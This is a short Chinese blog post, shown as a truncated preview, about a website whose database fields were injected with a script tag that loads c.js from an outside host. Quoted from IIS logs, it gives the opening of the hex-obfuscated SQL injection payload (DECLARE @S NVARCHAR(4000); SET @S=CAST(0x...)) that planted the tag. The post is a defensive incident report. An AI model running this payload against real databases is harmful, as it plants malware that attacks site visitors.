首页 相关文章 关于注入(css/c.js)

关于注入(css/c.js)

  这几天朋友的网站天天被搞破坏的人恶意注入,也许是程序没写好的原因,数据库每个字段加了一段script(Script Src=http://%63%2Enuclear3.com/css/c.js/Script,而这个script地址时不时的有变化)。用一些搜索引擎搜索下:/css/c.js/Script,发现好多网站居然都有这个问题。通过iis日志捕捉到注入的原型是以下形式:

;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt
  
(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032003500350029002C004000
  
4300200056006100720063006800610072002800320035003500290020004400650063006C00610072006500200054006100620
  
06C0065005F0043007500720073006F007200200043007500720073006F007200200046006F0...[ 查看全文 ]

2016-02-19 标签:

关于注入(css/c.js)的相关文章

手机页面
收藏网站 回到头部